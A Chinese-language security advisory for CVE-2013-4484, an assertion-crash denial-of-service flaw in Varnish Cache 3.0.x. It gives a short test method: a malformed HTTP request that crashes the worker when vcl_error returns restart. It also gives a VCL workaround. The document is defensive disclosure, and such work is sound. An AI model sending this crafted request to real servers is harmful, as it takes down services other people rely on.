发布日期：2013-10-29
更新日期：2013-11-01

受影响系统：

varnish-cache Varnish Cache 4.x
varnish-cache Varnish Cache 3.0.5

描述：

---

BUGTRAQ  ID: 63451
CVE(CAN) ID: CVE-2013-4484

Varnish Cache是Web应用加速器。

Varnish Cache 3.0.4及其他版本使用子进程'vcl_error{}'处理畸形请求，在实现上存在断言崩溃漏洞，攻击者可利用此漏洞使应用崩溃，导致拒绝服务。

<*来源：Poul-Henning Kamp
  
  链接：http://www.securityfocus.com/archive/1/529531
        http://seclists.org/bugtraq/2013/Oct/160
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

假设VCL的作用是：

    sub vcl_error {
        return(restart);
    }

发送畸形 HTTP 请求：

    GET<SP><SP><SP><CR><NL>
    Host:<SP>foo<CR><NL>
    <CR><NL>
    
Varnish将断言并重启子进程。

建议：

---

临时解决方法：

在VCL文件开始插入：
    
    sub vcl_error {
        if (obj.status == 400 || obj.status == 413) {
            return(deliver);
        }
    }
    
或者在现有vcl_error{}开始添加此测试。

厂商补丁：

varnish-cache
-------------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

https://www.varnish-cache.org/

浏览次数：3079
严重程度：0（网友投票）